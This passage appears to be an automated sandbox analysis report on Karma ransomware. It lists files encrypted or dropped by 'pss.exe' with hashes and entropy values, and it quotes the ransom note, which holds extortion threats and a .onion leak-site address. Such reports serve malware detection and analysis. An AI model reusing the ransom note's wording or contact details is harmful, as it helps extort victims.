SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\Desktop\PWCCAWLGRE\NVWZAPQSQL.pdf
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.828951016468186
Encrypted:false
SSDEEP:24:HNMS+nk3DhKfGGFWNYgo38vQz6BO57l3qtnwX9jAv:HNt+nklKeGFbgRQz9Bl3+69U
MD5:C7A4A386326626AC49A1AF5F8F333D2A
SHA1:BC11135C3D8384F8B1C8E7EF1F66DA4A86599B4F
SHA-256:49801119F049BB2D2B3371D4ED0C72A858B2DDB3FCC29AB7F25CC06A06C835B2
SHA-512:E20CCB7FCF89FEC1166B46B6CD2D0CEF68DC5AA599AD293AE12E0485A8131CD8B4B2FDDFE19EEC2F79ABFC070DED9E5783814D660DC5F53FA275B599897821F6
Malicious:false
C:\Users\user\Desktop\PWCCAWLGRE\PWCCAWLGRE.docx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.849687165675415
Encrypted:false
SSDEEP:24:mPzQDmzFo5xv0tpF7yYOwp+6r0AljYmv9HYjRvcV:mrOm2ctp5ywvvj/HKRe
MD5:A4B04415DC253B5089E71C7576D8DFB8
SHA1:7116627769B1AD762E28F67ABEA00E33F4FD5372
SHA-256:90D6423644A86B1448EB2AFCDBA4F534A948367723AE41018ECDE2F4BD81B761
SHA-512:AE1A62FDB1497A566A5F4E7E1EAFC6C7B1E5D0433471C982874D33AAFFFB245D88CDCC7744117A5726D5753074D7F4AE36650391EB700D16E6A8780BC45F7369
Malicious:false
C:\Users\user\Desktop\QCFWYSKMHA.pdf
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.811695096551344
Encrypted:false
SSDEEP:24:dx/SJrU/gRUdOgjKyBYegROpYZocXwGMs/NnRRQSGbslgBMS2:vSW5ADyB4ocMe2SGb0QMS2
MD5:D4FFCE4D6877BAEBBB522E5CADED02CA
SHA1:3B5315C966D5048A351A2A08F1FE4807A5B586AF
SHA-256:BF8038905211A7F931D5E91EF4B78FCB45C2C36669ADD68A3D16A93246781025
SHA-512:CB338C8AFF5C2C897AE36A88FCE15F78D88E6FDBE5A912186E5B03ADDC52D11BE3AA4219C4FF36BEA608FB316500A88730D1CC08626996B4AD2576788D5FBD7E
Malicious:false
C:\Users\user\Desktop\QCFWYSKMHA\BJZFPPWAPT.mp3
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.822506072907368
Encrypted:false
SSDEEP:24:AoPhATkn6lQSIA5SJogvs/Tzz44LRm1VAwgbw8wgiKroh7BiyXKBrWM:AopJSI1J7qTzzTILixVrc7BiyX2
MD5:09B9E1074BAED7E85E9DD2379EF2DDF9
SHA1:553E23A92BA02AF432BB6F722D815FDB0BD845DB
SHA-256:9FD067B5A7DD6031E90D0EF9E671960FA6DDBB0B4E83F359EB69ADE4063E32AF
SHA-512:E5DADCCB67B5D329A439CB22D5D6F140D654A3F03FEE06AB86CC05F3DEEC69AC8CEE7CD210ED7C45E7791923A8E18105F2C666B8C55C11F6D173CE53B6E3D22C
Malicious:false
C:\Users\user\Desktop\QCFWYSKMHA\BNAGMGSPLO.pdf
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.809728846675135
Encrypted:false
SSDEEP:24:uos26K2NeHJgp3CVLN11m2Ar3oFt6WMm9toL7zuD2:11w8pgpyVL9AD1s9toa6
MD5:F9EA9DC08E66C109E27CB43302F09720
SHA1:CCEE9CB0FF61A3688B7609606056AE412EFACBB8
SHA-256:0812A78EB76CEB97B92BBAF7EFEBB55E3CBEE04ECD9D5B0F246AB2D05037033D
SHA-512:E940CB434E5BF1E0ACBCDDAE87BEF470828F98C63805FA46352EBE7B1BF4AB7C8E57BD9CAC9ABABC034EDED4B15516A99F8BF5195E1B7869ED47B65B2BCE26C6
Malicious:false
C:\Users\user\Desktop\QCFWYSKMHA\EEGWXUHVUG.jpg
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.811268651205095
Encrypted:false
SSDEEP:24:TcINH4hlvMOURXwhd4KQyZasE9qvsDksCNWvalB5ciKpuB2nrlECi:4MH4hlvMOewhmy9eqE0WKBguBcECi
MD5:D6F84671D3DEA6E9B75165C041109374
SHA1:11D9692F5AA943E1E8FE38C8CB2025E58CA79064
SHA-256:6B31F2ECE9588DD723D3B34528F4706ED7195D4999B0D1B376352130AC9E5BC0
SHA-512:A9FCEAD3B3FC919779AE0FD77A5D58EF024AB1FAB03B1505CB36769B45A52A94E95338CC40458D427D865C6949617A0CDB5D20606C9F149A2248CE662302F099
Malicious:false
C:\Users\user\Desktop\QCFWYSKMHA\EFOYFBOLXA.png
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.81757232025939
Encrypted:false
SSDEEP:24:z4e+k0389GfD+T18fJLZTLFoEia6enyxhOQ5b9aVQGALoJ1t37Oora:zPw88fD+58rAaTyxsQcVQGh5/ra
MD5:B2C63A14DC226E90C5A776E69BC45107
SHA1:1A93EDFFDB5C80B862DE173C8D2B8FCF4AB50C4F
SHA-256:FC409361EF65E56F6C4F5805C2B5611CF59EE6781AB76C83BAE86DC318D3AE4F
SHA-512:203503F68EB9D178A1A31ACCA5BD30816699B71E803CD1850A5C03F571147031C69D2A83EE7EFDB50914ACD5E3D99D7F18E2C6A01028644D48B9F52E211F56CA
Malicious:false
C:\Users\user\Desktop\QCFWYSKMHA\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\Desktop\QCFWYSKMHA\QCFWYSKMHA.docx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.819987576366232
Encrypted:false
SSDEEP:24:uGzPF3iVmoJIX35dkd6FZltCWaKnIiZI7kELHpkKxsRQFeIXdc9vxsXiK:nztSVmN52d6FZmW5IfkQyMVc9eXT
MD5:134009ABA8DCD310E3DEE8AF045F6874
SHA1:B33A3F4105BF6301BA3546C6FFD88797B07CAC79
SHA-256:8B1EA5DC0B36FF110928A3337D4BB9DF983DAC6E576A0FEF0F079673E46E57F0
SHA-512:905FBB1F543AD6CF7A65E49713812FE7B40A1630289A3561C2CF77CE6581C98455B6B68D4DEB333FFF0FF01EC836EC2ABDE0F6512A770DB6FC5CAB93A705A910
Malicious:false
C:\Users\user\Desktop\QCFWYSKMHA\SUAVTZKNFL.xlsx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.836297220820901
Encrypted:false
SSDEEP:24:PYX48nATwYDZ0h88hqu2/gghYd0UuGPAr3YQuyNX5qlc3om:m4YAE9u8hqumYTf4bYhc3om
MD5:1AEEC87A119B9D92DA70AFC39ACEBF6B
SHA1:098CAC0893D447E3A0AFCAF550C724B5EB228B28
SHA-256:0B1C7EF9C64707CB9DBC4CD3962B16C386C7DB394D74FAE249D9C1114400DBD2
SHA-512:FBE227F3414BA8420CAD83530761BFADA2BC6BEE409E21F7DBF73D122007A1A1CD9D83A457E1A6FC5672D98F83AE735B869E1E385C01CE6CE838C412A74150E2
Malicious:false
C:\Users\user\Desktop\QNCYCDFIJJ.docx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.814016358271029
Encrypted:false
Malicious:false
C:\Users\user\Desktop\QNCYCDFIJJ.xlsx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.802170980754228
Encrypted:false
Malicious:false
C:\Users\user\Desktop\SQSJKEBWDT.jpg
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.815072333316551
Encrypted:false
Malicious:true
C:\Users\user\Desktop\SQSJKEBWDT\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\Desktop\SUAVTZKNFL.png
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.805569226974544
Encrypted:false
Malicious:false
C:\Users\user\Desktop\TQDFJHPUIU\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
Malicious:false
C:\Users\user\Desktop\ZGGKNSUKOP\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
Malicious:false
C:\Users\user\Documents\BJZFPPWAPT.jpg
Process:C:\Users\user\Desktop\pss.exe
File Type:DOS executable (COM, 0x8C-variant)
Category:dropped
Size (bytes):1095
Entropy (8bit):7.8483544477333265
Encrypted:false
Malicious:false
C:\Users\user\Documents\BJZFPPWAPT.mp3
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.807591287377502
Encrypted:false
Malicious:false
C:\Users\user\Documents\BNAGMGSPLO.pdf
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.789259349306412
Encrypted:false
Malicious:false
C:\Users\user\Documents\BNAGMGSPLO.xlsx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.798729109296202
Encrypted:false
Malicious:false
C:\Users\user\Documents\BNAGMGSPLO\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
Malicious:false
C:\Users\user\Documents\DUUDTUBZFW\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
Malicious:false
C:\Users\user\Documents\EEGWXUHVUG.jpg
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.807179350599828
Encrypted:false
Malicious:false
C:\Users\user\Documents\EFOYFBOLXA.png
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.808229798797674
Encrypted:false
Malicious:false
C:\Users\user\Documents\EOWRVPQCCS.png
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.820764315499837
Encrypted:false
Malicious:false
C:\Users\user\Documents\EWZCVGNOWT.mp3
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.8309656220719575
Encrypted:false
Malicious:false
C:\Users\user\Documents\GAOBCVIQIJ.docx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.80717479311287
Encrypted:false
Malicious:false
C:\Users\user\Documents\GAOBCVIQIJ\GAOBCVIQIJ.docx
Process:C:\Users\user\Desktop\pss.exe
File Type:DOS executable (COM, 0x8C-variant)
Category:dropped
Size (bytes):1095
Entropy (8bit):7.8280602413678
Encrypted:false
Malicious:false
C:\Users\user\Documents\GAOBCVIQIJ\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
Malicious:false
C:\Users\user\Documents\GAOBCVIQIJ\PIVFAGEAAV.mp3
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.827362631974762
Encrypted:false
Malicious:false
C:\Users\user\Documents\GAOBCVIQIJ\PWCCAWLGRE.jpg
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.808696676583605
Encrypted:false
Malicious:false
C:\Users\user\Documents\GAOBCVIQIJ\QCFWYSKMHA.pdf
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.829407730277449
Encrypted:false
Malicious:false
C:\Users\user\Documents\GAOBCVIQIJ\QNCYCDFIJJ.xlsx
Process:C:\Users\user\Desktop\pss.exe
File Type:DOS executable (COM, 0x8C-variant)
Category:dropped
Size (bytes):1095
Entropy (8bit):7.82386632332941
Encrypted:false
Malicious:false
C:\Users\user\Documents\GAOBCVIQIJ\SUAVTZKNFL.png
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.799274125397833
Encrypted:false
Malicious:false
C:\Users\user\Documents\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
Malicious:false
C:\Users\user\Documents\NVWZAPQSQL.pdf
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.81205410196831
Encrypted:false
Malicious:false
C:\Users\user\Documents\NYMMPCEIMA\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
Malicious:false
C:\Users\user\Documents\PIVFAGEAAV.mp3
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.802428226492806
Encrypted:false
Malicious:false
C:\Users\user\Documents\PWCCAWLGRE.docx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.821623393781539
Encrypted:false
Malicious:false
C:\Users\user\Documents\PWCCAWLGRE.jpg
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.813433140922798
Encrypted:false
Malicious:false
C:\Users\user\Documents\PWCCAWLGRE\BJZFPPWAPT.jpg
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.820970459397875
Encrypted:false
Malicious:false
C:\Users\user\Documents\PWCCAWLGRE\BNAGMGSPLO.xlsx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.799303533827198
Encrypted:false
Malicious:false
C:\Users\user\Documents\PWCCAWLGRE\EOWRVPQCCS.png
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.819475330846343
Encrypted:false
Malicious:false
C:\Users\user\Documents\PWCCAWLGRE\EWZCVGNOWT.mp3
Process:C:\Users\user\Desktop\pss.exe
File Type:SysEx File -
Category:dropped
Size (bytes):1095
Entropy (8bit):7.829261338930429
Encrypted:false
Malicious:false
C:\Users\user\Documents\PWCCAWLGRE\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
Malicious:false
C:\Users\user\Documents\PWCCAWLGRE\NVWZAPQSQL.pdf
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.832926575046884
Encrypted:false
Malicious:false
C:\Users\user\Documents\PWCCAWLGRE\PWCCAWLGRE.docx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.831178858085952
Encrypted:false
Malicious:false
C:\Users\user\Documents\QCFWYSKMHA.docx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.805470265535074
Encrypted:false
Malicious:false
C:\Users\user\Documents\QCFWYSKMHA.pdf
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.832398142121143
Encrypted:false
Malicious:false
C:\Users\user\Documents\QCFWYSKMHA\BJZFPPWAPT.mp3
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.81402376433519
Encrypted:false
Malicious:false
C:\Users\user\Documents\QCFWYSKMHA\BNAGMGSPLO.pdf
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.842261373481898
Encrypted:false
Malicious:false
C:\Users\user\Documents\QCFWYSKMHA\EEGWXUHVUG.jpg
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.82993784832169
Encrypted:false
SSDEEP:24:xWM4krPh4C46p5U9OkNvzkY8mwwyOZHI703klKy3h8aq0kcZ:akrPCC4E5mjewyO5E03ty3Ca7
MD5:6EAD7B398B20B715ED574366BB1C02EB
SHA1:96036A212C321C1BB3B4E7ACE3FC6C0B83BD254E
SHA-256:55F6CE6749B9F615C1E05A20D8126E546524B127FF01E897A13B857EA71321D0
SHA-512:C54D1191D75450F6568801CB35CC2327543ACF0A127B3CC3CCFE83501EB14D89D0D6D6CBBC422F444C0FDE90A378FAA4203FAD295F9FA96A74FBB04D3870D553
Malicious:false
C:\Users\user\Documents\QCFWYSKMHA\EFOYFBOLXA.png
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.833223265709336
Encrypted:false
SSDEEP:24:Tbf/osnpQdA4PL5pHDW9995pIXnqDoPOFZDjkDRC7V:XJ+dDPjK995pIfcDjIRyV
MD5:99E239A91FFC04A939EE701ACD00F5E1
SHA1:6CB6674B82A2C40BA93C906CFF302BD23F18E98F
SHA-256:399D276B99BFD9461A205BBD91935D2AA8E01F2E878A7E77F16C4EE2840A0220
SHA-512:C056240608BFF5056C5B5FFD81C37DFBD05BD6525483E174239D244CF8F435322874873254C1F9F7F8B1EB4B677EBC3F5B9B09B7BCB505E3780F5C497F256E8F
Malicious:false
C:\Users\user\Documents\QCFWYSKMHA\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\Documents\QCFWYSKMHA\QCFWYSKMHA.docx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.826097880997593
Encrypted:false
SSDEEP:24:iFo6XUSBF3/cxVSghLW88gz3M7JB1F0Foy8JDhw7nxve:ioKfB9crtUBgo1FCoy8Nhw7nxve
MD5:524F8ADD844E798556EF0F6FDB722ED2
SHA1:0CABB31FF8836C7FEBECF8935477D3F0DF6D6FE8
SHA-256:1C056BF12D5A1490A554D5FF010FD6033ABFFBBF1250C965D95018430AC07CFB
SHA-512:F10F899E6B7A8AB3ADAEFE3542DFB42D076B051F8CE4895F2176BEE735A27762E1F72926CF2C9239880A6E598A151581EC8DE855FF52899DE827EC0D9C2B1EB2
Malicious:false
C:\Users\user\Documents\QCFWYSKMHA\SUAVTZKNFL.xlsx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.812069223185366
Encrypted:false
SSDEEP:24:zJ9u1oTNR/zYAoWzdD7mC9bqJTDr1k5jL/Vo0zx:NAK7zYAveCpqplkl5F
MD5:0849B7EFBBC65E0B9442F3BDAE0F9D97
SHA1:326A3980EA30A540FDE862F1B762B36393CD6A5B
SHA-256:7A0EDF9DAA6A1E252E9C39A29F043DA2884F5DFA69C12A4A915BFE7B8058AAF2
SHA-512:C2872C1F5E2004177845668A4CE726FA9702CB87D663B9E3B8D75E30B363BA5ADC0FC56DE145E21248D24B01F7E2B79EF1B541BF6A379DBCAB4F0F5098C0561E
Malicious:false
C:\Users\user\Documents\QNCYCDFIJJ.xlsx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.791417124081268
Encrypted:false
SSDEEP:24:AhXV8GitS5U+GeZHs8vRWagm1kU+Pm9kgAbtznU728X9+4ZO0t:Afith+GKM8vRWa7F+AkxZw7N9Ue
MD5:9211F25FDA9480968F25D3A83BB5067C
SHA1:F9DB8957D4C0669835F4CE04B24CA04C2575C9DD
SHA-256:2D46C8A54BD29269C058110D5F3B0843C5BAB836B84050457E93FA222D994B38
SHA-512:CA3A7DD80571441A3204565D66DABD6354540ED4EC3D1A43C7FEB99839905357D6B5D41C0C80CD706E6C2C8302FB6EB65ABE257FBEB79FBED86C693C9C1DD612
Malicious:false
C:\Users\user\Documents\SQSJKEBWDT\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\Documents\SUAVTZKNFL.png
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.840548231736773
Encrypted:false
SSDEEP:24:CYw5AzY8u4SLZFqQtwWmu4A4ABRWRXY96DKsNi4if1DumiZ/qyksNmTX:3w5WYaSLXqZIxzMXY9BsUhf1wCyksgb
MD5:ED61314F5F0FFB14881AD2FFAE63AD4C
SHA1:351324EA57499EF27DA3CA3A43FB0C4D97937CFA
SHA-256:B50E271005A4E2C436771D1572A3A15C5C01C3277B6DD64415F615AA848E0A0C
SHA-512:DBFBC8A65A26DC84B2B2E90E50465E9A8BA58CB604D172FDA1718E7016896007DF169286C67C51D6764E6539AA407327365694C0582243400BFB6BABA1DA41E2
Malicious:false
C:\Users\user\Documents\SUAVTZKNFL.xlsx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.828959280386013
Encrypted:false
SSDEEP:24:YxOk/cxqSmLZj9C/e9KL1v+z/kOHtmAHT5bIa0CAHoG2AyWQ1+yISu4P0C:Y4k0sSmp9CFLB7Qt1zSVGGvyWQoyIJ4l
MD5:3D847B9B44072174582F31B1FA411AAE
SHA1:E15CFFDD576583FE0DB29C79FD0E47FAFD5852F0
SHA-256:FB564FB20E6B5D339E2444DB98512E69431BAF1B46AB3647BB937497736769D0
SHA-512:3A17A6A3394E905AA1CD5ED2735F89E66C074E2CDFDA3A81DCE7F528FBBAB5374201374BD001254FDF52CB392F0252A65E5E5D01CEB6FB006F714F89FA3B4416
Malicious:false
C:\Users\user\Documents\TQDFJHPUIU\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\Documents\ZGGKNSUKOP\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
C:\Users\user\Downloads\BJZFPPWAPT.jpg
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.81860388624575
Encrypted:false
SSDEEP:24:4XQHAyCiR9yuvEysdz/GuHEIQOzprOMwODNR/szl+NzkDNja/dHf:4XQHAynyAsZLHE88Mp/szl+N6M
MD5:12BBF409D907DF02E884729223C52AF1
SHA1:07B005F936504358ECBCA872FB2930270C628506
SHA-256:99597378781A2D85C81D71F447D5F016A6C691D24FAFB77E5692F87F0C38A093
SHA-512:277E94EC6F327F6B348858AB6B70BD979DF250B964300AC33D174DCE7D6650673879701394AF175200824959A3F11E7FAF57B9A1A12802091710CD73F22E6E69
Malicious:false
C:\Users\user\Downloads\BJZFPPWAPT.mp3
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.7788102223269595
Encrypted:false
